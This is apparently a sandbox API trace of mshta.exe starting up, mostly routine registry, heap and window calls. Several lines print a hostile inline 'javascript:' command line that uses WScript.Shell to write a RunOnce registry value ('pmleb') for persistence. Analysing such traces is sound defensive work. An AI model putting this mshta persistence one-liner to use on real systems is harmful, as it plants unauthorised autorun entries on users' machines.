0x0 [0065.171] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x98) returned 0x0 [0065.172] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet 
Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x94) returned 0x0 [0065.172] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.172] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.172] RegCloseKey (hKey=0x0) returned 0x6 [0065.172] RegCloseKey (hKey=0x0) returned 0x6 [0065.172] RegCloseKey (hKey=0x98) returned 0x0 [0065.172] RegCloseKey (hKey=0x94) returned 0x0 [0065.172] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0065.174] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x98) returned 0x0 [0065.175] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x9c) returned 0x0 [0065.175] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.175] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.175] RegCloseKey (hKey=0x0) returned 0x6 [0065.175] RegCloseKey (hKey=0x0) returned 0x6 [0065.175] RegCloseKey (hKey=0x98) returned 0x0 [0065.175] RegCloseKey (hKey=0x9c) returned 0x0 [0065.175] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x9c) returned 0x0 [0065.175] 
RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x98) returned 0x0 [0065.176] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.176] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.176] RegCloseKey (hKey=0x0) returned 0x6 [0065.176] RegCloseKey (hKey=0x0) returned 0x6 [0065.176] RegCloseKey (hKey=0x9c) returned 0x0 [0065.176] RegCloseKey (hKey=0x98) returned 0x0 [0065.176] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a0 | out: phkResult=0x33f0a0*=0x98) returned 0x0 [0065.176] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a4 | out: phkResult=0x33f0a4*=0x9c) returned 0x0 [0065.176] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.176] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x33f060 | out: phkResult=0x33f060*=0x0) returned 0x2 [0065.176] RegCloseKey (hKey=0x0) returned 0x6 [0065.177] RegCloseKey (hKey=0x0) returned 0x6 [0065.177] RegCloseKey (hKey=0x98) returned 0x0 [0065.177] RegCloseKey (hKey=0x9c) returned 0x0 [0065.177] GetSystemMetrics (nIndex=68) returned 4 [0065.177] GetSystemMetrics (nIndex=69) returned 4 [0065.177] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14 
[0065.178] GetSystemDefaultLCID () returned 0x409 [0065.178] GetVersionExW (in: lpVersionInformation=0x33f004*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x77c6e36c, dwMinorVersion=0x77c6e0d2, dwBuildNumber=0x7502afd8, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x33f004*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0065.178] GetUserDefaultUILanguage () returned 0x409 [0065.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x33ef54, cchData=16 | out: lpLCData="\x03") returned 16 [0065.180] GetKeyboardLayoutList (in: nBuff=32, lpList=0x33ef84 | out: lpList=0x33ef84) returned 1 [0065.180] GetSystemMetrics (nIndex=4096) returned 0 [0065.180] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0a8 | out: phkResult=0x33f0a8*=0x9c) returned 0x0 [0065.180] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f0ac | out: phkResult=0x33f0ac*=0x98) returned 0x0 [0065.180] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f068 | out: phkResult=0x33f068*=0x0) returned 0x2 [0065.181] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x33f068 | out: phkResult=0x33f068*=0x0) returned 0x2 [0065.181] RegCloseKey (hKey=0x0) returned 0x6 [0065.181] RegCloseKey (hKey=0x0) returned 0x6 [0065.181] RegCloseKey (hKey=0x9c) returned 0x0 [0065.181] RegCloseKey (hKey=0x98) returned 0x0 [0065.181] GetModuleFileNameW (in: hModule=0x74af0000, lpFilename=0x33ef10, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll")) returned 0x1e [0065.181] RtlAllocateHeap (HeapHandle=0x760000, 
Flags=0x0, Size=0x3e) returned 0x773f38 [0065.181] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0065.181] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0065.181] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0065.181] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0065.181] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0065.181] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc16c [0065.181] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc16d [0065.181] GetDC (hWnd=0x0) returned 0x100109eb [0065.182] SHCreateShellPalette (hdc=0x0) returned 0xe0806e9 [0065.182] GetPaletteEntries (in: hpal=0xe0806e9, iStart=0x0, cEntries=0x100, pPalEntries=0x7502a494 | out: pPalEntries=0x7502a494) returned 0x100 [0065.182] SHGetInverseCMAP (in: pbMap=0x75028a7c, cbMap=0x4 | out: pbMap=0x75028a7c) returned 0x0 [0065.182] GetDeviceCaps (hdc=0x100109eb, index=38) returned 32409 [0065.182] ReleaseDC (hWnd=0x0, hDC=0x100109eb) returned 1 [0065.182] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20a) returned 0x77ebd0 [0065.183] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x2000) returned 0x77f5e8 [0065.183] GetCurrentProcessId () returned 0x7bc [0065.183] _vsnprintf (in: _DstBuf=0x33f454, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x33f11c | out: _DstBuf="#MSHTML#PERF#000007BC") returned 21 [0065.183] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#000007BC") returned 0x0 [0065.183] GetVersionExW (in: lpVersionInformation=0x33f138*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x763828, dwMinorVersion=0x100, dwBuildNumber=0x77ddd0, dwPlatformId=0x760000, szCSDVersion="A") | out: lpVersionInformation=0x33f138*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0065.183] 
GetModuleHandleW (lpModuleName="advapi32") returned 0x77710000 [0065.183] GetProcAddress (hModule=0x77710000, lpProcName="EventWrite") returned 0x77ca0c59 [0065.184] GetProcAddress (hModule=0x77710000, lpProcName="EventRegister") returned 0x77c7f6ba [0065.184] GetProcAddress (hModule=0x77710000, lpProcName="EventUnregister") returned 0x77c99241 [0065.184] EtwEventRegister () returned 0x0 [0065.184] EtwRegisterTraceGuidsW () returned 0x0 [0065.185] EtwRegisterTraceGuidsW () returned 0x0 [0065.185] EtwEventRegister () returned 0x0 [0065.187] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Office14\\outllib.dll", lpdwHandle=0x33ef04 | out: lpdwHandle=0x33ef04) returned 0x0 [0065.188] GetModuleHandleW (lpModuleName=0x0) returned 0x970000 [0065.188] GetModuleFileNameW (in: hModule=0x970000, lpFilename=0x33ef10, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.188] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0065.192] GetCurrentProcessId () returned 0x7bc [0065.192] GetCurrentProcessId () returned 0x7bc [0065.194] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0xbc [0065.194] GetLastError () returned 0x0 [0065.268] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0x100 [0065.268] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x120000 [0065.271] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x200e78 | out: hHeap=0x200000) returned 1 [0065.271] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x200f88 | out: hHeap=0x200000) returned 1 [0065.271] RegCloseKey (hKey=0x42) returned 0x0 [0065.271] GetModuleHandleW 
(lpModuleName="kernel32.dll") returned 0x76d30000 [0065.271] GetProcAddress (hModule=0x76d30000, lpProcName="RegisterApplicationRestart") returned 0x76d6b53c [0065.271] lstrlenA (lpString="\"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") returned 255 [0065.271] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x0, Size=0x200) returned 0x200e78 [0065.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x762c22, cbMultiByte=-1, lpWideCharStr=0x200e78, cchWideChar=256 | out: lpWideCharStr="\"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") returned 256 [0065.271] RegisterApplicationRestart (pwzCommandline="\"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", dwFlags=0x0) returned 0x0 [0065.271] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x200e78 | out: hHeap=0x200000) returned 1 [0065.272] GetProcAddress (hModule=0x74af0000, lpProcName="RunHTMLApplication") returned 0x74b4e710 [0065.275] GetCommandLineW () returned="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"" [0065.280] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x204) returned 0x784010 [0065.280] 
OleInitialize (pvReserved=0x0) returned 0x0 [0065.330] IsWindow (hWnd=0x0) returned 0 [0065.330] RegisterClassW (lpWndClass=0x33f7bc) returned 0xc059 [0065.330] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x970000, lpParam=0x75029680) returned 0x6011a [0065.331] NtdllDefWindowProc_W () returned 0x0 [0065.331] NtdllDefWindowProc_W () returned 0x1 [0065.333] NtdllDefWindowProc_W () returned 0x0 [0065.824] NtdllDefWindowProc_W () returned 0x0 [0065.824] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x6011a, hMenu=0x0, hInstance=0x970000, lpParam=0x75029680) returned 0x3027a [0065.824] NtdllDefWindowProc_W () returned 0x0 [0065.824] NtdllDefWindowProc_W () returned 0x1 [0065.824] NtdllDefWindowProc_W () returned 0x0 [0065.825] NtdllDefWindowProc_W () returned 0x0 [0065.825] SetWindowLongW (hWnd=0x3027a, nIndex=-16, dwNewLong=-2100363264) returned 114229248 [0065.826] NtdllDefWindowProc_W () returned 0x0 [0065.826] NtdllDefWindowProc_W () returned 0x0 [0065.826] NtdllDefWindowProc_W () returned 0x0 [0065.826] NtdllDefWindowProc_W () returned 0x0 [0065.826] NtdllDefWindowProc_W () returned 0x0 [0065.827] NtdllDefWindowProc_W () returned 0x0 [0065.827] SetWindowPos (hWnd=0x3027a, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0065.827] NtdllDefWindowProc_W () returned 0x0 [0065.827] NtdllDefWindowProc_W () returned 0x0 [0065.828] NtdllDefWindowProc_W () returned 0x0 [0065.828] NtdllDefWindowProc_W () returned 0x0 [0065.829] NtdllDefWindowProc_W () returned 0x0 [0065.829] SendMessageW (hWnd=0x3027a, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0065.829] NtdllDefWindowProc_W () returned 0x0 [0065.830] NtdllDefWindowProc_W () returned 0x0 [0065.830] 
RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x204) returned 0x78b718 [0065.830] PathRemoveArgsW (in: pszPath="\"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"" | out: pszPath="\"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") [0065.830] PathRemoveBlanksW (in: pszPath="\"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"" | out: pszPath="\"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") [0065.830] PathUnquoteSpacesW (in: lpsz="\"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"" | out: lpsz="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 1 [0065.831] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="javascript:o=new ActiveXObject('WScript.Shell');x=new 
ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ppmk=0x33f81c*=0x0, dwFlags=0x1 | out: ppmk=0x33f81c*=0x78af40) returned 0x0 [0065.846] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78b718 | out: hHeap=0x760000) returned 1 [0065.847] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78ba60 [0065.847] CoCreateInstance (in: rclsid=0x74c29770*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74cab75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x750296d4 | out: ppv=0x750296d4*=0x794ec0) returned 0x0 [0065.848] DllGetClassObject (in: rclsid=0x792280*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7666ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ead4 | out: ppv=0x33ead4*=0x75028cb0) returned 0x0 [0065.848] IClassFactory:CreateInstance (in: This=0x75028cb0, pUnkOuter=0x0, riid=0x33f480*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33eac0 | out: ppvObject=0x33eac0*=0x794ec0) returned 0x0 [0065.848] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x2a8) returned 0x794438 [0065.849] GetCurrentThreadId () returned 0x544 [0065.965] RegisterClassExW (param_1=0x33e96c) returned 0xc16a [0065.965] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc16a, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x74af0000, lpParam=0x0) returned 0x20280 [0065.966] GetWindowLongW (hWnd=0x20280, 
nIndex=-20) returned 0 [0065.966] NtdllDefWindowProc_W () returned 0x1 [0065.966] NtdllDefWindowProc_W () returned 0x0 [0065.966] NtdllDefWindowProc_W () returned 0x0 [0065.967] NtdllDefWindowProc_W () returned 0x0 [0065.967] NtdllDefWindowProc_W () returned 0x0 [0065.967] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78ba78 [0065.967] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78ba90 [0065.967] CreateCompatibleDC (hdc=0x0) returned 0x3010a0d [0065.967] GetDeviceCaps (hdc=0x3010a0d, index=90) returned 96 [0065.967] GetDeviceCaps (hdc=0x3010a0d, index=88) returned 96 [0065.967] GetSystemMetrics (nIndex=68) returned 4 [0065.967] GetSystemMetrics (nIndex=69) returned 4 [0065.967] GetSystemMetrics (nIndex=2) returned 17 [0065.967] GetSystemMetrics (nIndex=3) returned 17 [0065.968] GetStockObject (i=13) returned 0x18a002e [0065.968] SelectObject (hdc=0x3010a0d, h=0x18a002e) returned 0x18a002e [0065.968] GetTextMetricsW (in: hdc=0x3010a0d, lptm=0x33ea04 | out: lptm=0x33ea04) returned 1 [0065.968] SelectObject (hdc=0x3010a0d, h=0x18a002e) returned 0x18a002e [0065.968] DeleteObject (ho=0x18a002e) returned 1 [0065.968] GetSystemDefaultLCID () returned 0x409 [0065.968] GetUserDefaultLCID () returned 0x409 [0065.968] GetACP () returned 0x4e4 [0065.968] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x33e978, cchData=41 | out: lpLCData="1") returned 2 [0065.968] _wtoi (_String="1") returned 1 [0065.968] RegCloseKey (hKey=0x0) returned 0x6 [0065.968] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x33e9cc, cchData=16 | out: lpLCData="0123456789") returned 11 [0065.968] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x7502b038, fWinIni=0x0 | out: pvParam=0x7502b038) returned 1 [0065.968] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x33ea40, fWinIni=0x0 | out: pvParam=0x33ea40) returned 1 [0065.968] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc0) returned 
0x7947f0 [0065.968] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78baa8 [0065.969] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xa4) returned 0x7948b8 [0065.969] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x783610 [0065.969] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1c) returned 0x790400 [0065.969] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x779328 [0065.969] GetSystemWindowsDirectoryW (in: lpBuffer=0x33e84c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0065.969] lstrlenW (lpString="C:\\Windows") returned 10 [0065.969] lstrlenW (lpString="\\WindowsShell.manifest") returned 22 [0065.969] CreateActCtxW (pActCtx=0x33e828) returned 0x79496c [0065.971] ActivateActCtx (in: hActCtx=0x79496c, lpCookie=0x33e7f8 | out: hActCtx=0x79496c, lpCookie=0x33e7f8) returned 1 [0065.971] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x754a0000 [0065.976] DeactivateActCtx (dwFlags=0x0, ulCookie=0x11af0001) returned 1 [0065.977] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb [0065.977] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32 [0065.977] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8 [0065.978] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32 [0065.978] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x33e458, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.978] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x33e660, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.978] GetCurrentProcess () returned 0xffffffff [0065.978] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x33e868, nSize=0x104 | 
out: lpBaseName="mshta.exe") returned 0x9 [0065.978] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0065.978] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x783630 [0065.978] FindAtomW (lpString="TridentEnableHiRes") returned 0x0 [0065.978] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x33e444, pvData=0x33e450, pcbData=0x33e44c*=0x4 | out: pdwType=0x33e444*=0x0, pvData=0x33e450, pcbData=0x33e44c*=0x4) returned 0x2 [0065.979] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33e3bc | out: phkResult=0x33e3bc*=0x168) returned 0x0 [0065.979] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33e3c0 | out: phkResult=0x33e3c0*=0x164) returned 0x0 [0065.979] RegOpenKeyExW (in: hKey=0x164, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x33e37c | out: phkResult=0x33e37c*=0x0) returned 0x2 [0065.980] RegOpenKeyExW (in: hKey=0x168, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x33e37c | out: phkResult=0x33e37c*=0x0) returned 0x2 [0065.980] RegCloseKey (hKey=0x0) returned 0x6 [0065.980] RegCloseKey (hKey=0x0) returned 0x6 [0065.980] RegCloseKey (hKey=0x168) returned 0x0 [0065.980] RegCloseKey (hKey=0x164) returned 0x0 [0065.980] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x97c) returned 0x794ec0 [0065.981] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x480) returned 0x795848 [0065.981] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.981] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.981] MulDiv (nNumber=1073741823, nNumerator=96, 
nDenominator=1440) returned 71582788 [0065.981] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.981] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x794cd0 [0065.981] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x794d28 [0065.981] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x795cd0 [0065.981] GetCurrentThreadId () returned 0x544 [0065.981] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bb68 [0065.981] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x2c) returned 0x77d960 [0065.981] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x80) returned 0x795d28 [0065.981] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc169 [0065.981] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x783650 [0065.981] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1 [0065.982] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x75028cd4, dwReserved=0x0 | out: ppSM=0x75028cd4*=0x795db0) returned 0x0 [0065.988] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x64) returned 